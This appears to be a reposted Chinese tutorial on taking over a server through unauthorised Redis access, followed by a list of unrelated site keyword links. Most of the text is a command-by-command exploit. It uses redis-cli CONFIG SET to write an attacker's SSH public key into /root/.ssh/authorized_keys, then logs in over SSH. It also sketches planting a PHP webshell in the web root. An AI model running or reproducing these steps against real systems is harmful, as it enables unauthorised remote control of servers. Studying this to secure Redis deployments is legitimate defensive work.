Redis未授权访问导致服务器被控制
发表于:2024-10-27 作者:千家信息网编辑
千家信息网最后更新 2024年10月27日,通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!首先使用下列命令安装Redis tools:root@kali:~# apt-get install r
千家信息网最后更新 2024年10月27日Redis未授权访问导致服务器被控制
通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!
首先使用下列命令安装Redis tools:
root@kali:~# apt-get install redis-tools
然后通过下列命令看是否是未授权访问:
root@kali:~# redis-cli -h 10.198.131.110.198.131.1:6379>
然后我们可以使用免密登录的方式进行相关***:
生成公钥:
root@lsy:~/.ssh# ssh-keygen -t rsaroot@lsy:~/.ssh# cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsyroot@lsy:~/.ssh#
将公钥写入远程服务器:
root@lsy:~/.ssh# redis-cli -h 10.198.131.110.198.131.1:6379> CONFIG SET dir /root/.ssh/OK10.198.131.1:6379> CONFIG SET dbfilename authorized_keysOK10.198.131.1:6379> set xxxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"OK10.198.131.1:6379> saveOK10.198.131.1:6379> exit
使用ssh远程登录:
root@lsy:~/.ssh# ssh 10.198.131.1
免密登录成功:
上传webshell
#redis-cli -h 192.168.2.5 -p 6379192.168.2.5:6379>config set dir /var/wwww/html192.168.2.5:6379>config set dbfilename 1.php192.168.2.5:6379>set webshell ""192.168.2.5:6379>save
登录
服务
公钥
命令
服务器
成功
方式
端口
尝试
生成
控制
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
服务器换内存条蓝屏
大学生信息网络安全学习心得
智慧芽 数据库 怎么收费的
网络安全法第33.34条
斯洛登 棱镜门 网络安全
高校网络安全专题会议讲话稿
手机怎么弄虚拟服务器
吉林服务器机柜供应商
网站访问量两千用什么云服务器
数据库1048错误
正规网络技术服务质量保证
服务器安全防护工作方案
建邺区常规软件开发创新服务
内蒙古软件开发服务价钱
乐山软件开发方案
肉山谷寻找服务器
常德软件开发培训哪里好
网络技术维修与维护
请将数据库升为最新版本
停车管理软件开发流程
软件开发考证有哪些
事业单位网络安全专业性强吗
软件开发方法有架构
白城市网络安全知识
互联网科技的创新
dota 数据库
网络软件开发专业介绍
服务器与数据库一般用什么接口
网络安全工作议事
软件开发需要显卡么